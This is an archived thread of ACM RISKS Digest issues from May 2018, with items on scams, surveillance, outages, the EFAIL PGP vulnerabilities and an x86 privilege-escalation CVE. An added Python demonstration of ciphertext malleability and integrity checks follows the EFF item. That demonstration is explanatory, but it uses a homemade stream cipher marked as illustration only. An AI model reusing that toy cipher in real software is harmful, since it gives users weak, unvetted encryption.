    there'd be a fix by now for the Internet's oldest hustle -- the Nigerian
    Prince scam. There's generally more awareness that a West African noble
    demanding $1,000 in order to send you millions is a scam, but the underlying
    logic of these ``pay a little, get a lot'' schemes, also known as 419
    fraud, still ensnares a ton of people. In fact, groups of fraudsters in
    Nigeria continue to make millions off of these classic cons. And they
    haven't just refined the techniques and expanded their targets -- they've
    gained minor celebrity status for doing it.

    http://www.wired.com/story/nigerian-email-scammers-more-effective-than-ever

    ------------------------------

    Date: Sun 6 May 2018 11:12:58 -0000
    From: "Wendy M. Grossman" <wen...@pelicancrossing.net>
    Subject: Dark code (DW)

    In the wake of the TSB computing disaster, DW has a long piece on the
    legacy code that runs banking systems, so old that no one understands it any
    more. The problem: you can't stay in business without updating, and updating
    it breaks things.

    Ellen Ullman has often written about this -- see for example 1997's Close to
    the Machine and her more recent sort-of-sequel.

    http://m.dw.com/en/fail-by-design-bankings-legacy-of-dark-code/a-43645522

    ------------------------------

    Date: Sun, 6 May 2018 13:36:41 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Postmortem of Fortnite Service Outage (Epic Games)

    On 11 Apr 2018, we experienced an extended outage coinciding with the
    release of Fortnite 3.5. The outage blocked all logins for all players to
    our platform. We know many millions of you were excited about dropping from
    the Battle Bus with your friends, and it was a long time to wait to check
    out our 3.5 release. We sincerely apologize for the downtime.

    We're sharing more technical details in this post to give you a better
    understanding about what went wrong, what we did to fix it, and how we can
    prevent future issues like this from happening again.

    http://www.epicgames.com/fortnite/en-US/news/postmortem-of-service-outage-4-12

    ------------------------------

    Date: Sun, 6 May 2018 16:31:20 -0700
    From: Mark Thorson <e...@dialup4less.com>
    Subject: Collateral damage (538)

    You can't opt out from other people sharing data about you, such as the
    relative of the Golden State Killer who put DNA data on a website.

    http://fivethirtyeight.com/features/you-cant-opt-out-of-sharing-your-data-even-if-you-didnt-opt-in/

    ------------------------------

    Date: Mon, 7 May 2018 16:16:28 -0400
    From: George Mannes <gma...@gmail.com>
    Subject: Dozens of security cameras hacked in Japan (Mainichi)

    from Mainichi.jp English-language site:
    http://mainichi.jp/english/articles/20180507/p2g/00m/0dm/063000c#cxrecs_s

    TOKYO (Kyodo) -- Dozens of Canon Inc.'s security cameras connected to the
    Internet have been hacked across Japan, making them uncontrollable at
    waterways, a fish market, and a care facility among other places, users said
    Monday. Over 60 cameras nationwide are believed to have been illegally
    accessed so far. ...

    While it remains unclear why Canon cameras have been targeted, the city of
    Yachiyo in Chiba Prefecture and the city of Ageo in Saitama Prefecture,
    which lost control of the cameras for monitoring the levels of their
    waterways, said they had failed to reset the cameras' default passwords. ...

    Hackings were also reported at other locations including a fish market in
    Hiroshima, a care facility for the disabled in Kobe, and a Naha branch of a
    company based in Saitama Prefecture....

    [This news item seems custom-designed for a classic-style PGN joke linking
    fishy business at the market, constant comp.risks complaints about poor
    password management, and Hiroshima's hometown baseball team, the Carp. Have
    at it.]

    [OK. Carpe Diem? I had dinner in Kobe's in Lahaina (Maui) last night. I
    have no beef with this item, even if it might smell fishy. ``If you knew
    Sushi like I knew Sushi,'' oh, whatta place... ``She shells seashells by
    the seashore.'' PGN]

    ------------------------------

    Date: Wed, 9 May 2018 23:53:49 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Technology turns our cities into spies for ICE, whether we like
    it or not (LATimes)

    There are more than 30 Oakland Police Department patrol cars roaming the
    city with license plate readers, specialized cameras that can scan and
    record up to 60 license plates per second. Meanwhile, the Alameda County
    Sheriff's Office maintains a fleet of six drones to monitor crime scenes
    when it sees fit. The Alameda County district attorney's office owns a
    StingRay, a device that acts as a fake cell tower and forces phones to give
    up their location. And that's just in one little corner of California.

    Just as consumer electronics continually get faster, cheaper, smaller, and
    more sophisticated, so too do the tools law enforcement uses to spy on
    us. What once demanded significant money and manpower can be accomplished
    easily by machine. This advanced technology is hurtling toward us so fast
    that privacy laws can't keep up.

    http://www.latimes.com/opinion/op-ed/la-oe-farivar-surveillance-tech-20180502-story.html

    ------------------------------

    Date: Sun, 6 May 2018 22:22:09 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Digital Vigilantes Who Hack Back (The New Yorker)

    American companies that fall victim to data breaches want to retaliate
    against the culprits. But can they do so without breaking the law?

    http://www.newyorker.com/magazine/2018/05/07/the-digital-vigilantes-who-hack-back

    ------------------------------

    Date: Wed, 9 May 2018 23:57:31 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Bring in the Nerds: EFF Introduces Actual Encryption Experts to
    U.S. Senate Staff (EFF)

    Electronic Frontier Foundation

    Earlier today in the U.S. Capitol Visitor Center, EFF convened a closed-door
    briefing for Senate staff about the realities of device encryption. While
    policymakers hear frequently from the FBI and the Department of Justice
    about the dangers of encryption and the so-called Going Dark problem, they
    very rarely hear from actual engineers, cryptographers, and computer
    scientists. Indeed, the usual suspects testifying before Congress on
    encryption are nearly the antithesis of technical experts.

    The all-star lineup of panelists included Dr. Matt Blaze, professor of
    computer science at the University of Pennsylvania; Dr. Susan Landau,
    professor of cybersecurity and policy at Tufts University; Erik
    Neuenschwander, Apple's manager of user privacy; and EFF's tech policy
    director Dr. Jeremy Gillula.

    http://www.eff.org/deeplinks/2018/0...ces-actual-encryption-experts-us-senate-staff

    [Incidentally, this is the 20th anniversary of the famous L0pht testimony
    from Mudge's team, which immediately followed my testimony for the
    U.S. Permanent Subcommittee on Investigations of the Senate Committee on
    Governmental Affairs included in Weak Computer Security in Government: Is
    the Public at Risk? <http://www.csl.sri.com/neumann/senate98.html> PGN]

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Email Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    http://fortune.com/2018/05/14/email-encryption-tool-vulnerability-cybersecurity-warning/

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    http://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community to the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now, because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/
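    The post above makes two points that are easy to state but worth seeing run: a
    ciphertext produced without integrity protection is malleable (changing a byte of
    ciphertext changes the corresponding byte of the decrypted text, and nothing
    reports it), and an integrity check that a client warns about but does not act on
    protects nothing. The following is an added example written for this page, not
    code from EFF, from the researchers, or from any OpenPGP implementation. It uses
    a toy SHA-256 counter-mode stream cipher with an HMAC tag (encrypt-then-MAC) purely
    for illustration; the keys, nonce and message are constructed sample values, and
    the helper names (`seal`, `open_strict`, `open_lenient`, `flip_byte`, `demo`) are
    mine. It does not model the OpenPGP MDC format or the paper's HTML exfiltration.

```python
import hashlib
import hmac

TAG_LEN = 32  # length of an HMAC-SHA256 tag in bytes


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy counter-mode keystream from SHA-256 (for illustration only)."""
    blocks = bytearray()
    counter = 0
    while len(blocks) < length:
        blocks += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(blocks[:length])


def xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt with no integrity protection (XOR is its own inverse)."""
    return bytes(d ^ k for d, k in zip(data, _keystream(key, nonce, len(data))))


def seal(enc_key: bytes, mac_key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: ciphertext followed by an HMAC over nonce and ciphertext."""
    ct = xor_stream(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return ct + tag


class IntegrityError(Exception):
    """Raised when the tag does not verify; the caller must not render anything."""


def open_strict(enc_key: bytes, mac_key: bytes, nonce: bytes, blob: bytes) -> bytes:
    """Fail closed: refuse to decrypt unless the tag verifies."""
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise IntegrityError("integrity check failed; refusing to render")
    return xor_stream(enc_key, nonce, ct)


def open_lenient(enc_key: bytes, mac_key: bytes, nonce: bytes, blob: bytes):
    """Mirrors the client behaviour the post criticises: note the failure, render anyway."""
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    ok = hmac.compare_digest(tag, expected)
    return ok, xor_stream(enc_key, nonce, ct)


def flip_byte(blob: bytes, index: int, mask: int = 0x20) -> bytes:
    """Simulate one corrupted or altered ciphertext byte in transit."""
    b = bytearray(blob)
    b[index] ^= mask
    return bytes(b)


def demo() -> dict:
    # Constructed sample values; not real keys.
    enc_key = b"constructed-enc-key-sample"
    mac_key = b"constructed-mac-key-sample"
    nonce = b"nonce-01"
    msg = b"meet at noon"

    # 1. No integrity check: the altered ciphertext decrypts silently to altered text,
    #    and every byte other than the one touched is unchanged (malleability).
    ct = xor_stream(enc_key, nonce, msg)
    tampered_pt = xor_stream(enc_key, nonce, flip_byte(ct, 0))

    # 2. Integrity check enforced: the altered message is rejected outright.
    blob = seal(enc_key, mac_key, nonce, msg)
    try:
        open_strict(enc_key, mac_key, nonce, flip_byte(blob, 0))
        strict_rejected = False
    except IntegrityError:
        strict_rejected = True

    # 3. Integrity check present but ignored: the user sees exactly what case 1 shows.
    ok, lenient_pt = open_lenient(enc_key, mac_key, nonce, flip_byte(blob, 0))

    return {
        "malleable": tampered_pt != msg and tampered_pt[1:] == msg[1:],
        "strict_rejected": strict_rejected,
        "lenient_check_ok": ok,
        "lenient_shows_tampered": lenient_pt == tampered_pt,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

    The third case is the one the post's last paragraph describes: a client that
    tells the user the check failed but displays the decrypted text anyway gives
    the recipient no more protection than a message that carried no check at all.
    Only the fail-closed path (`open_strict`) turns the integrity mechanism into a
    defence.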

    ------------------------------

    Date: Wed, 9 May 2018 23:50:09 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Once Again, Activists Must Beg the Government to Preserve the
    Right to Repair (Motherboard)

    The excruciating DMCA section 1201 exemption process is upon us again,
    and the right to repair tractors, cars, and electronics is at stake.

    http://motherboard.vice.com/en_us/article/mbxzyv/dmca-1201-exemptions

    ------------------------------

    Date: Thu, 10 May 2018 04:34:02 -0700
    From: Bob Gezelter <geze...@rlgsc.com>
    Subject: Widespread Misunderstanding of x86-64 Privileged Instruction
    Leads to Widespread Escalation Hazard (MITRE CVE 2018-8897)

    Apparently, a large number of kernel-level developers have misunderstood the
    documentation concerning the interruptability of an x86-64 instruction. This
    misunderstanding has made many major operating systems on the x86-64
    platform vulnerable to a privilege escalation hazard.

    Patches have reportedly been issued. Intel has also re-issued its x86-64
    Software Development Manuals.

    A description of the vulnerability can be found at:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897

    [For those of you following the CVE list, it has just exceeded 100,000 CVE
    entries. This should be a warning for anyone reading RISKS who believes
    our computer systems are secure. PGN]

    ------------------------------

    Date: Thu, 10 May 2018 18:01:36 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Alexa and Siri Can Hear This Hidden Command Audio Attacks (NYTimes)

    http://www.nytimes.com/2018/05/10/technology/alexa-siri-hidden-command-audio-attacks.html

    Researchers can now send secret audio instructions undetectable to the human
    ear to Apple's Siri, Amazon's Alexa and Google's Assistant.

    ------------------------------

    Date: Fri, 11 May 2018 11:15:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Buckle Up, Prime Members: Amazon Launches In-Car Delivery
    (Business Wire)

    Millions of Prime members with Chevrolet, Buick, GMC, Cadillac and Volvo
    cars can now use Amazon Key to have their Amazon packages delivered inside
    their vehicle parked at home, work or near other locations in their address
    book.

    In-car delivery is available at no extra cost for Prime members -- customers
    simply download the Amazon Key App, link to their connected car and start
    ordering on Amazon.com; no additional hardware or devices required.

    To get started, customers download the Amazon Key App and then link their
    Amazon account with their connected car service account. Once setup is
    complete and the delivery location has been registered, customers can shop
    on Amazon.com and select the In-Car delivery option at checkout.

    On delivery day, the Amazon Key App lets customers check if they've parked
    within range of the delivery location, and provides notifications with the
    expected 4-hour delivery time window. The App also notifies customers when
    the delivery is on its way, and the package has been delivered. Customers
    can track when their car was unlocked and relocked in the App's activity
    feed, and rate their in-car delivery.

    http://www.businesswire.com/news/ho...Prime-Members-Amazon-Launches-In-Car-Delivery

    ------------------------------

    Date: Sat, 12 May 2018 02:30:18 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Meant to Monitor Inmates' Calls Could Track You Too (NYTimes)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Sat, 12 May 2018 06:38:12 -0700
    From: Bob Gezelter <geze...@rlgsc.com>
    Subject: Cell Phone Location data reportedly available to law enforcement
    without verification/process (Ars Technica)

    Ars Technica is reporting that a service meant for use with prison phone
    systems lacks authentication and safeguards. It has reportedly already been
    used to track people without legal jurisdiction.

    Access to non-anonymized geolocation data for mobile devices by third
    parties is a serious privacy hazard. The article does not indicate the
    degree of reporting or other measures undertaken to ensure accountability.
    In this context, even advertising delivered to an identifiable device is a
    hazard.

    http://arstechnica.com/tech-policy/...bility-to-get-real-time-mobile-location-data/

    ------------------------------

    Date: Sun, 13 May 2018 11:08:59 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: During disasters, active Twitter users likely to spread
    falsehoods: Study examines Boston Marathon bombing, Hurricane Sandy; also
    finds most users fail to correct misinformation (Science Daily)

    http://www.sciencedaily.com/releases/2018/05/180512190537.htm

    ------------------------------

    Date: Sun, 13 May 2018 10:01:11 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: "Warning: Dangerous Fake Emails About Google Privacy Changes"

    (Lauren's Blog)
    http://lauren.vortex.com/2018/05/13/warning-dangerous-fake-emails-about-google-privacy-changes

    If you use much of anything Google, by now you've likely gotten at least one
    email from Google noting various privacy-related changes. They typically
    have the Subject:

    Improvements to our Privacy Policy and Privacy Controls

    and tend to arrive not from the expected simple "google.com" domain but
    rather from unusual appearing Google subdomains, with addresses like:

    privacy...@www3.l.google.com

    The notice also includes a bunch of links to various relevant privacy pages
    and/or systems at Google.

    All of this is in advance of the effective date for the European Union's
    "GDPR" laws. If you're not familiar with the GDPR, it's basically the latest
    hypocritical move by the EU on their relentless march toward dictating the
    control of personal data globally and to further their demands to become a
    global censorship czar -- with the ability to demand the deletion of any
    search engine results around the world that they find inconvenient. Joseph
    Stalin would heartily approve.

    One can assume that Google's privacy team has been putting in yeoman's
    service to meet the EU's dictatorial demands, and it's logical that Google
    decided to make other changes in their privacy ecosystem at the same time,
    and now is informing users about those changes.

    Unfortunately, phishing crooks are apparently already taking advantage of
    this situation -- in particular several aspects of these Google notification
    emails.

    First, the legitimate Google privacy emails going out recently and
    currently are a veritable flood. It appears that Google is sending
    these out to virtually every email address ever associated with any
    Google account since perhaps the dawn of time. I've already received
    approximately 1.3E9 of them. OK, not really that many, but it FEELS
    like that many.

    Some of these are coming in to addresses that I don't even recognize.
    This morning one showed up to such a strange address that I had to go
    digging in my alias databases to figure out what it actually was. It
    turned out to be so ancient that cobwebs flew out of my screen at me
    when I accessed its database entry.

    Seriously, these are one hell of a lot of emails, and the fact that
    they come from somewhat unusual looking google subdomains and include
    links has made them fodder for the crooks.

    You can guess what's happening. Phishing and other criminal types are
    sending out fraudulent emails that superficially appear to be the same
    as these legit Google privacy policy notification emails. Of course,
    some or all of the links in the phishing emails lead not to Google but
    to various evil traps and personal data stealing tricks.

    So please, be extraordinarily careful when you receive what appear to be
    these privacy notices from Google. With so many real ones going out -- with
    multiples often ending up at the same individual via various redirects and
    forwarding addresses -- it's easy for fake versions to slip in among the
    real ones, and clicking on the links in the crooked ones or opening
    attachments that they include can seriously ruin your day, to say the very
    least.

    Take care, all.

    ------------------------------

    Date: Mon, 14 May 2018 18:12:34 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Face recognition police tools 'staggeringly inaccurate' (BBC.com)

    'The Metropolitan Police used facial recognition at London's Notting Hill
    carnival in 2016 and 2017 and at a Remembrance Sunday event. 'Its system
    incorrectly flagged 102 people as potential suspects and led to no
    arrests. 'In figures given to Big Brother Watch, South Wales Police said
    its technology had made 2,685 "matches" between May 2017 and March 2018 -
    but 2,451 were false alarms. 'Big Brother Watch also raised concerns that
    photos of any "false alarms" were sometimes kept by police for weeks.'

    Perhaps the UK should import and deploy PRC cameras per RISKS-30.65.

    ------------------------------

    Date: Tue, 15 May 2018 13:25:53 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Intel Documentation Blamed for Multiple Operating System Security
    Flaws (IT Pro)

    Anybody who's been involved with tech for a while has most likely come
    across the expression "RTFM" on more than one occasion. Usually delivered
    with a degree of snark, if not downright hostility, the initialism stands
    for "read the ... manual," with an expletive added for good
    measure. As is often pointed out, the advice is not only rude, it's also
    often not helpful. Sometimes there is no documentation to read and if there
    is, it's poorly written and difficult to understand.

    The latter seems to be the case with CVE-2018-8897, the latest operating
    system vulnerability.

    On May 8, Nick Peterson of Everdox Tech and Nemanja Mulasmajic of
    triplefault.io, made public a research paper that revealed all major
    operating systems -- Linux, Apple, Windows and BSD -- to be affected by a
    flaw that can allow authenticated users to read data in memory or control
    low-level OS functions. The good news is that the researchers notified
    software developers of the problem on April 30, and by the time it was made
    public, patches were at the ready.

    http://www.itprotoday.com/endpoint-...lamed-multiple-operating-system-security-flaw

    ------------------------------

    Date: Tue, 15 May 2018 17:52:40 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Problem with Chinese GPS (Now I Know)

    If you're in a foreign country and try to read a map, you may find it
    difficult -- unless your host nation's language is the same as your home
    nation's, the words are going to be different and, assuming you're not
    bilingual, will require some translation. But the locations of the roads,
    rivers, buildings, and the like should be the same, regardless of whether
    the map is in English, Spanish, or Chinese, right? Language aside, Google
    Maps should work the same everywhere, right?

    Well, no.

    http://nowiknow.com/the-problem-with-chinese-gps/

    ------------------------------

    Date: Tue, 15 May 2018 19:06:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: U.S. identifies suspect in major leak of CIA hacking tools (WashPo)

    The former agency employee is being held in a Manhattan jail on unrelated
    charges.

    http://www.washingtonpost.com/world...5ef3f8-5865-11e8-8836-a4a123c359ab_story.html

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.69
    ************************
  3. LakeGator

    Risks Digest 30.70

    RISKS List Owner

    May 26, 2018 7:09 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 26 May 2018 Volume 30 : Issue 70

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)
    Don't Put That in My Heart Until You're Sure It Really Works (NYT)
    "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)
    "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)
    Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)
    "This cryptocurrency phishing attack uses new trick to drain wallets"
    (Danny Palmer)
    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)
    ICE abandons its dream of ‘extreme vetting’ software that could
    E-Mail Clients are Insecure, PGP and S/MIME 100% secure
    E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)
    "Senator wants to know how police can locate any phone in seconds without
    a warrant" (Zach Whittaker)
    US cell carriers are selling access to your real-time phone location data
    (Zach Whittaker)
    Hundreds of Apps Can Empower Stalkers to Track Their Victims (NYTimes)
    "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into
    secret eavesdroppers" (CSO Online)
    So, Umm, Google Duplex's Chatter Is Not Quite Human (Scientific American)
    Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence (The Wrap)
    Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)
    Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)
    Most GDPR emails unnecessary and some illegal, say experts (The Guardian)
    The Pentagon Has a Big Plan to Solve Identity Verification in Two Years
    (Defense One)
    Unplug Your Echo! (Ars Technica)
    FBI dramatically overstates how many phones they can't get into (WaPo)
    "Google to remove "secure" indicator from HTTPS pages on Chrome" (ZDNet)
    Google's Selfish Ledger is an unsettling vision of Silicon Valley social
    engineering (The Verge)
    "A flaw in a connected alarm system exposed vehicles to remote hacking"
    (ZDNet)
    Syrian hackers who tricked reporters indicted (WashPo)
    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    (ZDNet)
    Is technology bringing history to life or distorting it? (WashPo)
    Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)
    Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)
    The surprising return of the repo man (WashPo)
    Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)
    Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to Win
    Election (NY Times)
    Re: Securing Elections (Mark E. Smith)
    Re: Dark code (Kelly Bert Manning, Richard O'Keefe)
    Fitness App Leads To Arrest For Attack On McLean Cyclist (McLean VA Patch)
    Man Is Charged With Hacking West Point and Government Websites (NYT)
    Fake Facebook accounts and online lies multiply in hours after Santa Fe
    school shooting (WashPo)
    Re: "Warning: Dangerous Fake Emails About Google Privacy Changes" (Wol)
    Re: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (Yooly)
    Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    Re: Chinese GPS (Dimitri Maziuk)
    Re: The risk from robot weapons (Amos Shapir)
    Will You Be My Emergency Contact Takes On a Whole New Meaning (NYT)
    This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)
    As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 22 May 2018 09:31:51 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)

    Boy, 9, dies in accident involving motorized room partition at his Fairfax school

    ------------------------------

    Date: Mon, 21 May 2018 19:30:25 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Don't Put That in My Heart Until You're Sure It Really Works
    (NYTimes)

    Opinion | Don’t Put That in My Heart Until You’re Sure It Really Works

    'The bar for approval of medical devices is too low. There is no reason we
    shouldn’t require, as we almost always do for drugs, a randomized
    placebo-controlled trial showing improvements in “hard” outcomes like
    mortality before approving them.

    'Unfortunately, the United States may soon make it even easier for medical
    devices to reach the patient’s bedside. The Food and Drug Administration is
    considering requiring less upfront research and instead adding increased
    oversight after a device has been introduced into the market. The argument
    is that this will spur technological innovation and perhaps help terminally
    ill patients. However, loosening regulations could extract a steep cost from
    patients and the health system.'

    Greater release frequency with less rigorous pre-production qualification
    criteria and test coverage is NOT a recipe for safe and viable embedded
    software stacks that drive these gizmos. Suppressing production defect
    escape potential is challenging. Proactive techniques that facilitate early
    and rapid software defect discovery capability -- such as continuous
